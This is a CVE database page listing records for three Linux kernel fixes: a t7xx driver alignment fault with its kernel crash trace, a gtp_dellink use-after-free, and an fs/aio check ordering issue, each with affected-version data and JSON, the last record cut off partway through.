net: wwan: t7xx: Split 64bit accesses to fix alignment issues

Summary

In the Linux kernel, the following vulnerability has been resolved: net: wwan: t7xx: Split 64bit accesses to fix alignment issues Some of the registers are aligned on a 32bit boundary, causing alignment faults on 64bit platforms. Unable to handle kernel paging request at virtual address ffffffc084a1d004 Mem abort info: ESR = 0x0000000096000061 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x21: alignment fault Data abort info: ISV = 0, ISS = 0x00000061, ISS2 = 0x00000000 CM = 0, WnR = 1, TnD = 0, TagAccess = 0 GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 swapper pgtable: 4k pages, 39-bit VAs, pgdp=0000000046ad6000 [ffffffc084a1d004] pgd=100000013ffff003, p4d=100000013ffff003, pud=100000013ffff003, pmd=0068000020a00711 Internal error: Oops: 0000000096000061 [#1] SMP Modules linked in: mtk_t7xx(+) qcserial pppoe ppp_async option nft_fib_inet nf_flow_table_inet mt7921u(O) mt7921s(O) mt7921e(O) mt7921_common(O) iwlmvm(O) iwldvm(O) usb_wwan rndis_host qmi_wwan pppox ppp_generic nft_reject_ipv6 nft_reject_ipv4 nft_reject_inet nft_reject nft_redir nft_quota nft_numgen nft_nat nft_masq nft_log nft_limit nft_hash nft_flow_offload nft_fib_ipv6 nft_fib_ipv4 nft_fib nft_ct nft_chain_nat nf_tables nf_nat nf_flow_table nf_conntrack mt7996e(O) mt792x_usb(O) mt792x_lib(O) mt7915e(O) mt76_usb(O) mt76_sdio(O) mt76_connac_lib(O) mt76(O) mac80211(O) iwlwifi(O) huawei_cdc_ncm cfg80211(O) cdc_ncm cdc_ether wwan usbserial usbnet slhc sfp rtc_pcf8563 nfnetlink nf_reject_ipv6 nf_reject_ipv4 nf_log_syslog nf_defrag_ipv6 nf_defrag_ipv4 mt6577_auxadc mdio_i2c libcrc32c compat(O) cdc_wdm cdc_acm at24 crypto_safexcel pwm_fan i2c_gpio i2c_smbus industrialio i2c_algo_bit i2c_mux_reg i2c_mux_pca954x i2c_mux_pca9541 i2c_mux_gpio i2c_mux dummy oid_registry tun sha512_arm64 sha1_ce sha1_generic seqiv md5 geniv des_generic libdes cbc authencesn authenc leds_gpio xhci_plat_hcd xhci_pci xhci_mtk_hcd xhci_hcd nvme nvme_core gpio_button_hotplug(O) dm_mirror dm_region_hash dm_log dm_crypt dm_mod dax usbcore usb_common ptp aquantia pps_core mii tpm encrypted_keys trusted CPU: 3 PID: 5266 Comm: kworker/u9:1 Tainted: G O 6.6.22 #0 Hardware name: Bananapi BPI-R4 (DT) Workqueue: md_hk_wq t7xx_fsm_uninit [mtk_t7xx] pstate: 804000c5 (Nzcv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : t7xx_cldma_hw_set_start_addr+0x1c/0x3c [mtk_t7xx] lr : t7xx_cldma_start+0xac/0x13c [mtk_t7xx] sp : ffffffc085d63d30 x29: ffffffc085d63d30 x28: 0000000000000000 x27: 0000000000000000 x26: 0000000000000000 x25: ffffff80c804f2c0 x24: ffffff80ca196c05 x23: 0000000000000000 x22: ffffff80c814b9b8 x21: ffffff80c814b128 x20: 0000000000000001 x19: ffffff80c814b080 x18: 0000000000000014 x17: 0000000055c9806b x16: 000000007c5296d0 x15: 000000000f6bca68 x14: 00000000dbdbdce4 x13: 000000001aeaf72a x12: 0000000000000001 x11: 0000000000000000 x10: 0000000000000000 x9 : 0000000000000000 x8 : ffffff80ca1ef6b4 x7 : ffffff80c814b818 x6 : 0000000000000018 x5 : 0000000000000870 x4 : 0000000000000000 x3 : 0000000000000000 x2 : 000000010a947000 x1 : ffffffc084a1d004 x0 : ffffffc084a1d004 Call trace: t7xx_cldma_hw_set_start_addr+0x1c/0x3c [mtk_t7xx] t7xx_fsm_uninit+0x578/0x5ec [mtk_t7xx] process_one_work+0x154/0x2a0 worker_thread+0x2ac/0x488 kthread+0xe0/0xec ret_from_fork+0x10/0x20 Code: f9400800 91001000 8b214001 d50332bf (f9000022) ---[ end trace 0000000000000000 ]--- The inclusion of io-64-nonatomic-lo-hi.h indicates that all 64bit accesses can be replaced by pairs of nonatomic 32bit access. Fix alignment by forcing all accesses to be 32bit on 64bit platforms.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/beaf0e7996b79e06c…
	https://git.kernel.org/stable/c/2e22c9cb618716b8e…
	https://git.kernel.org/stable/c/b4fdb3c197e35f655…
	https://git.kernel.org/stable/c/7d5a7dd5a35876f0e…

Impacted products

Vendor

Product

Version

Linux

Affected: 39d439047f1dc88f98b755d6f3a53a4ef8f0de21 , < beaf0e7996b79e06ccc2bdcb4442fbaeccc31200 (git)
Affected: 39d439047f1dc88f98b755d6f3a53a4ef8f0de21 , < 2e22c9cb618716b8e557fe17c3d4958171288082 (git)
Affected: 39d439047f1dc88f98b755d6f3a53a4ef8f0de21 , < b4fdb3c197e35f655b2d9b6759ce29440eacdfda (git)
Affected: 39d439047f1dc88f98b755d6f3a53a4ef8f0de21 , < 7d5a7dd5a35876f0ecc286f3602a88887a788217 (git)

Linux

Affected: 5.19
Unaffected: 0 , < 5.19 (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35909",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T15:11:59.449585Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:56.526Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.057Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/beaf0e7996b79e06ccc2bdcb4442fbaeccc31200"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2e22c9cb618716b8e557fe17c3d4958171288082"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b4fdb3c197e35f655b2d9b6759ce29440eacdfda"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7d5a7dd5a35876f0ecc286f3602a88887a788217"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wwan/t7xx/t7xx_cldma.c",
            "drivers/net/wwan/t7xx/t7xx_hif_cldma.c",
            "drivers/net/wwan/t7xx/t7xx_pcie_mac.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "beaf0e7996b79e06ccc2bdcb4442fbaeccc31200",
              "status": "affected",
              "version": "39d439047f1dc88f98b755d6f3a53a4ef8f0de21",
              "versionType": "git"
            },
            {
              "lessThan": "2e22c9cb618716b8e557fe17c3d4958171288082",
              "status": "affected",
              "version": "39d439047f1dc88f98b755d6f3a53a4ef8f0de21",
              "versionType": "git"
            },
            {
              "lessThan": "b4fdb3c197e35f655b2d9b6759ce29440eacdfda",
              "status": "affected",
              "version": "39d439047f1dc88f98b755d6f3a53a4ef8f0de21",
              "versionType": "git"
            },
            {
              "lessThan": "7d5a7dd5a35876f0ecc286f3602a88887a788217",
              "status": "affected",
              "version": "39d439047f1dc88f98b755d6f3a53a4ef8f0de21",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wwan/t7xx/t7xx_cldma.c",
            "drivers/net/wwan/t7xx/t7xx_hif_cldma.c",
            "drivers/net/wwan/t7xx/t7xx_pcie_mac.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.19"
            },
            {
              "lessThan": "5.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: wwan: t7xx: Split 64bit accesses to fix alignment issues\n\nSome of the registers are aligned on a 32bit boundary, causing\nalignment faults on 64bit platforms.\n\n Unable to handle kernel paging request at virtual address ffffffc084a1d004\n Mem abort info:\n ESR = 0x0000000096000061\n EC = 0x25: DABT (current EL), IL = 32 bits\n SET = 0, FnV = 0\n EA = 0, S1PTW = 0\n FSC = 0x21: alignment fault\n Data abort info:\n ISV = 0, ISS = 0x00000061, ISS2 = 0x00000000\n CM = 0, WnR = 1, TnD = 0, TagAccess = 0\n GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n swapper pgtable: 4k pages, 39-bit VAs, pgdp=0000000046ad6000\n [ffffffc084a1d004] pgd=100000013ffff003, p4d=100000013ffff003, pud=100000013ffff003, pmd=0068000020a00711\n Internal error: Oops: 0000000096000061 [#1] SMP\n Modules linked in: mtk_t7xx(+) qcserial pppoe ppp_async option nft_fib_inet nf_flow_table_inet mt7921u(O) mt7921s(O) mt7921e(O) mt7921_common(O) iwlmvm(O) iwldvm(O) usb_wwan rndis_host qmi_wwan pppox ppp_generic nft_reject_ipv6 nft_reject_ipv4 nft_reject_inet nft_reject nft_redir nft_quota nft_numgen nft_nat nft_masq nft_log nft_limit nft_hash nft_flow_offload nft_fib_ipv6 nft_fib_ipv4 nft_fib nft_ct nft_chain_nat nf_tables nf_nat nf_flow_table nf_conntrack mt7996e(O) mt792x_usb(O) mt792x_lib(O) mt7915e(O) mt76_usb(O) mt76_sdio(O) mt76_connac_lib(O) mt76(O) mac80211(O) iwlwifi(O) huawei_cdc_ncm cfg80211(O) cdc_ncm cdc_ether wwan usbserial usbnet slhc sfp rtc_pcf8563 nfnetlink nf_reject_ipv6 nf_reject_ipv4 nf_log_syslog nf_defrag_ipv6 nf_defrag_ipv4 mt6577_auxadc mdio_i2c libcrc32c compat(O) cdc_wdm cdc_acm at24 crypto_safexcel pwm_fan i2c_gpio i2c_smbus industrialio i2c_algo_bit i2c_mux_reg i2c_mux_pca954x i2c_mux_pca9541 i2c_mux_gpio i2c_mux dummy oid_registry tun sha512_arm64 sha1_ce sha1_generic seqiv\n md5 geniv des_generic libdes cbc authencesn authenc leds_gpio xhci_plat_hcd xhci_pci xhci_mtk_hcd xhci_hcd nvme nvme_core gpio_button_hotplug(O) dm_mirror dm_region_hash dm_log dm_crypt dm_mod dax usbcore usb_common ptp aquantia pps_core mii tpm encrypted_keys trusted\n CPU: 3 PID: 5266 Comm: kworker/u9:1 Tainted: G O 6.6.22 #0\n Hardware name: Bananapi BPI-R4 (DT)\n Workqueue: md_hk_wq t7xx_fsm_uninit [mtk_t7xx]\n pstate: 804000c5 (Nzcv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : t7xx_cldma_hw_set_start_addr+0x1c/0x3c [mtk_t7xx]\n lr : t7xx_cldma_start+0xac/0x13c [mtk_t7xx]\n sp : ffffffc085d63d30\n x29: ffffffc085d63d30 x28: 0000000000000000 x27: 0000000000000000\n x26: 0000000000000000 x25: ffffff80c804f2c0 x24: ffffff80ca196c05\n x23: 0000000000000000 x22: ffffff80c814b9b8 x21: ffffff80c814b128\n x20: 0000000000000001 x19: ffffff80c814b080 x18: 0000000000000014\n x17: 0000000055c9806b x16: 000000007c5296d0 x15: 000000000f6bca68\n x14: 00000000dbdbdce4 x13: 000000001aeaf72a x12: 0000000000000001\n x11: 0000000000000000 x10: 0000000000000000 x9 : 0000000000000000\n x8 : ffffff80ca1ef6b4 x7 : ffffff80c814b818 x6 : 0000000000000018\n x5 : 0000000000000870 x4 : 0000000000000000 x3 : 0000000000000000\n x2 : 000000010a947000 x1 : ffffffc084a1d004 x0 : ffffffc084a1d004\n Call trace:\n t7xx_cldma_hw_set_start_addr+0x1c/0x3c [mtk_t7xx]\n t7xx_fsm_uninit+0x578/0x5ec [mtk_t7xx]\n process_one_work+0x154/0x2a0\n worker_thread+0x2ac/0x488\n kthread+0xe0/0xec\n ret_from_fork+0x10/0x20\n Code: f9400800 91001000 8b214001 d50332bf (f9000022)\n ---[ end trace 0000000000000000 ]---\n\nThe inclusion of io-64-nonatomic-lo-hi.h indicates that all 64bit\naccesses can be replaced by pairs of nonatomic 32bit access.  Fix\nalignment by forcing all accesses to be 32bit on 64bit platforms."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:08:09.788Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/beaf0e7996b79e06ccc2bdcb4442fbaeccc31200"
        },
        {
          "url": "https://git.kernel.org/stable/c/2e22c9cb618716b8e557fe17c3d4958171288082"
        },
        {
          "url": "https://git.kernel.org/stable/c/b4fdb3c197e35f655b2d9b6759ce29440eacdfda"
        },
        {
          "url": "https://git.kernel.org/stable/c/7d5a7dd5a35876f0ecc286f3602a88887a788217"
        }
      ],
      "title": "net: wwan: t7xx: Split 64bit accesses to fix alignment issues",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35909",
    "datePublished": "2024-05-19T08:35:02.446Z",
    "dateReserved": "2024-05-17T13:50:33.121Z",
    "dateUpdated": "2025-05-04T09:08:09.788Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27396 (GCVE-0-2024-27396)

Vulnerability from cvelistv5 – Published: 2024-05-09 16:37 – Updated: 2025-05-04 12:55

Title

net: gtp: Fix Use-After-Free in gtp_dellink

Summary

In the Linux kernel, the following vulnerability has been resolved: net: gtp: Fix Use-After-Free in gtp_dellink Since call_rcu, which is called in the hlist_for_each_entry_rcu traversal of gtp_dellink, is not part of the RCU read critical section, it is possible that the RCU grace period will pass during the traversal and the key will be free. To prevent this, it should be changed to hlist_for_each_entry_safe.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/07b20d0a3dc13fb1a…
	https://git.kernel.org/stable/c/718df1bc226c383dd…
	https://git.kernel.org/stable/c/0caff3e6390f84066…
	https://git.kernel.org/stable/c/2e74b3fd6bf542349…
	https://git.kernel.org/stable/c/25a1c2d4b1fcf9383…
	https://git.kernel.org/stable/c/2aacd4de454775829…
	https://git.kernel.org/stable/c/cd957d1716ec979d8…
	https://git.kernel.org/stable/c/f2a904107ee2b647b…

Impacted products

Vendor

Product

Version

Linux

Affected: 043a283d24f40fea4c8a8d06b0e2694c8e372200 , < 07b20d0a3dc13fb1adff10b60021a4924498da58 (git)
Affected: c185e1d6e2752a4b656c3ca878c525fa11f55757 , < 718df1bc226c383dd803397d7f5d95557eb81ac7 (git)
Affected: 94dc550a5062030569d4aa76e10e50c8fc001930 , < 0caff3e6390f840666b8dc1ecebf985c2ef3f1dd (git)
Affected: 94dc550a5062030569d4aa76e10e50c8fc001930 , < 2e74b3fd6bf542349758f283676dff3660327c07 (git)
Affected: 94dc550a5062030569d4aa76e10e50c8fc001930 , < 25a1c2d4b1fcf938356a9688a96a6456abd44b29 (git)
Affected: 94dc550a5062030569d4aa76e10e50c8fc001930 , < 2aacd4de45477582993f8a8abb9505a06426bfb6 (git)
Affected: 94dc550a5062030569d4aa76e10e50c8fc001930 , < cd957d1716ec979d8f5bf38fc659aeb9fdaa2474 (git)
Affected: 94dc550a5062030569d4aa76e10e50c8fc001930 , < f2a904107ee2b647bb7794a1a82b67740d7c8a64 (git)
Affected: a29c4303930bc0c25ae6a4f365dcdef71447b4ea (git)

Linux

Affected: 5.5
Unaffected: 0 , < 5.5 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27396",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T15:23:40.567279Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:47:11.173Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:34:52.256Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/07b20d0a3dc13fb1adff10b60021a4924498da58"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/718df1bc226c383dd803397d7f5d95557eb81ac7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0caff3e6390f840666b8dc1ecebf985c2ef3f1dd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2e74b3fd6bf542349758f283676dff3660327c07"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/25a1c2d4b1fcf938356a9688a96a6456abd44b29"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2aacd4de45477582993f8a8abb9505a06426bfb6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cd957d1716ec979d8f5bf38fc659aeb9fdaa2474"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f2a904107ee2b647bb7794a1a82b67740d7c8a64"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/gtp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "07b20d0a3dc13fb1adff10b60021a4924498da58",
              "status": "affected",
              "version": "043a283d24f40fea4c8a8d06b0e2694c8e372200",
              "versionType": "git"
            },
            {
              "lessThan": "718df1bc226c383dd803397d7f5d95557eb81ac7",
              "status": "affected",
              "version": "c185e1d6e2752a4b656c3ca878c525fa11f55757",
              "versionType": "git"
            },
            {
              "lessThan": "0caff3e6390f840666b8dc1ecebf985c2ef3f1dd",
              "status": "affected",
              "version": "94dc550a5062030569d4aa76e10e50c8fc001930",
              "versionType": "git"
            },
            {
              "lessThan": "2e74b3fd6bf542349758f283676dff3660327c07",
              "status": "affected",
              "version": "94dc550a5062030569d4aa76e10e50c8fc001930",
              "versionType": "git"
            },
            {
              "lessThan": "25a1c2d4b1fcf938356a9688a96a6456abd44b29",
              "status": "affected",
              "version": "94dc550a5062030569d4aa76e10e50c8fc001930",
              "versionType": "git"
            },
            {
              "lessThan": "2aacd4de45477582993f8a8abb9505a06426bfb6",
              "status": "affected",
              "version": "94dc550a5062030569d4aa76e10e50c8fc001930",
              "versionType": "git"
            },
            {
              "lessThan": "cd957d1716ec979d8f5bf38fc659aeb9fdaa2474",
              "status": "affected",
              "version": "94dc550a5062030569d4aa76e10e50c8fc001930",
              "versionType": "git"
            },
            {
              "lessThan": "f2a904107ee2b647bb7794a1a82b67740d7c8a64",
              "status": "affected",
              "version": "94dc550a5062030569d4aa76e10e50c8fc001930",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "a29c4303930bc0c25ae6a4f365dcdef71447b4ea",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/gtp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.5"
            },
            {
              "lessThan": "5.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "4.19.93",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "5.4.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.14.162",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: gtp: Fix Use-After-Free in gtp_dellink\n\nSince call_rcu, which is called in the hlist_for_each_entry_rcu traversal\nof gtp_dellink, is not part of the RCU read critical section, it\nis possible that the RCU grace period will pass during the traversal and\nthe key will be free.\n\nTo prevent this, it should be changed to hlist_for_each_entry_safe."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:55:30.840Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/07b20d0a3dc13fb1adff10b60021a4924498da58"
        },
        {
          "url": "https://git.kernel.org/stable/c/718df1bc226c383dd803397d7f5d95557eb81ac7"
        },
        {
          "url": "https://git.kernel.org/stable/c/0caff3e6390f840666b8dc1ecebf985c2ef3f1dd"
        },
        {
          "url": "https://git.kernel.org/stable/c/2e74b3fd6bf542349758f283676dff3660327c07"
        },
        {
          "url": "https://git.kernel.org/stable/c/25a1c2d4b1fcf938356a9688a96a6456abd44b29"
        },
        {
          "url": "https://git.kernel.org/stable/c/2aacd4de45477582993f8a8abb9505a06426bfb6"
        },
        {
          "url": "https://git.kernel.org/stable/c/cd957d1716ec979d8f5bf38fc659aeb9fdaa2474"
        },
        {
          "url": "https://git.kernel.org/stable/c/f2a904107ee2b647bb7794a1a82b67740d7c8a64"
        }
      ],
      "title": "net: gtp: Fix Use-After-Free in gtp_dellink",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27396",
    "datePublished": "2024-05-09T16:37:18.867Z",
    "dateReserved": "2024-02-25T13:47:42.677Z",
    "dateUpdated": "2025-05-04T12:55:30.840Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35815 (GCVE-0-2024-35815)

Vulnerability from cvelistv5 – Published: 2024-05-17 13:23 – Updated: 2025-05-04 09:05

Title

fs/aio: Check IOCB_AIO_RW before the struct aio_kiocb conversion

Summary

In the Linux kernel, the following vulnerability has been resolved: fs/aio: Check IOCB_AIO_RW before the struct aio_kiocb conversion The first kiocb_set_cancel_fn() argument may point at a struct kiocb that is not embedded inside struct aio_kiocb. With the current code, depending on the compiler, the req->ki_ctx read happens either before the IOCB_AIO_RW test or after that test. Move the req->ki_ctx read such that it is guaranteed that the IOCB_AIO_RW test happens first.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/10ca82aff58434e12…
	https://git.kernel.org/stable/c/396dbbc18963648e9…
	https://git.kernel.org/stable/c/94eb0293703ced580…
	https://git.kernel.org/stable/c/a71cba07783abc76b…
	https://git.kernel.org/stable/c/18d5fc3c16cc317bd…
	https://git.kernel.org/stable/c/c01ed748847fe8b81…
	https://git.kernel.org/stable/c/5c43d0041e3a05c6c…
	https://git.kernel.org/stable/c/961ebd120565cb60c…

Impacted products

Vendor

Product

Version

Linux

Affected: 337b543e274fe7a8f47df3c8293cc6686ffa620f , < 10ca82aff58434e122c7c757cf0497c335f993f3 (git)
Affected: b4eea7a05ee0ab5ab0514421e6ba8c5d249cf942 , < 396dbbc18963648e9d1a4edbb55cfe08fa374d50 (git)
Affected: ea1cd64d59f22d6d13f367d62ec6e27b9344695f , < 94eb0293703ced580f05dfbe5a57da5931e9aee2 (git)
Affected: d7b6fa97ec894edd02f64b83e5e72e1aa352f353 , < a71cba07783abc76b547568b6452cd1dd9981410 (git)
Affected: 18f614369def2a11a52f569fe0f910b199d13487 , < 18d5fc3c16cc317bd0e5f5dabe0660df415cadb7 (git)
